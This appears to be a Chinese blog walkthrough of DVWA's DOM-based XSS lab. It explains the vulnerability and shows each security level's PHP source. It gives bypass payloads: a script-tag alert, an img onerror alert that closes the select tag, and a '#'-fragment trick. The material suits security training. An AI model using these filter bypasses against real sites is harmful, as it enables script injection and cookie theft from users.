DVWA DOM Based Cross Site Scripting (DOM型 XSS)
XSS跨站原理
当应用程序发送给浏览器的页面中包含用户提交的数据,但没有经过适当验证或转义时,就会导致跨站脚本漏洞。这个“跨”实际上属于浏览器的特性,而不是缺陷;
浏览器同源策略:只有发布Cookie的网站才能读取Cookie。
会造成Cookie窃取、劫持用户Web行为、结合CSRF进行针对性攻击等危害
DOM型
基于文档对象模型(Document Object Model)的一种漏洞;
DOM型与反射型类似,都需要攻击者诱使用户点击专门设计的URL;
Dom型 xss 是通过 url 传入参数去控制触发的;
Dom型返回页面源码中看不到输入的payload, 而是保存在浏览器的DOM中。
Low
1、分析网页源代码
<?php
# No protections, anything goes
?>
//没有任何防御措施
2、修改default,在URL拼接Payload
<script>alert(/XSS/)</script>
Medium
1、分析网页源代码
<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
$default = $_GET['default'];
# Do not allow script tags
if (stripos ($default, "<script") !== false) {
header ("location: ?default=English");
exit;
}
}
?>
增加对"<script"字符的过滤,查看前端代码
2、构造闭合"option"和"select"标签,执行弹出"/xss/"的语句
</optin></select><img src = 1 onerror = alert(/xss/)>
High
1、分析网页源代码
<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
# White list the allowable languages
switch ($_GET['default']) {
case "French":
case "English":
case "German":
case "Spanish":
# ok
break;
default:
header ("location: ?default=English");
exit;
}
}
?>
2、在注入的 payload 中加入注释符 “#”,注释后边的内容不会发送到服务端,但是会被前端代码所执行。
(空格)#<script>alert(/xss/)</script>
Impossible
<?php
# Don't need to do anything, protction handled on the client side
?>
# 大多数情况下浏览器都会对 URL 中的内容进行编码,这会阻止任何注入的 JavaScript 被执行。
329
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
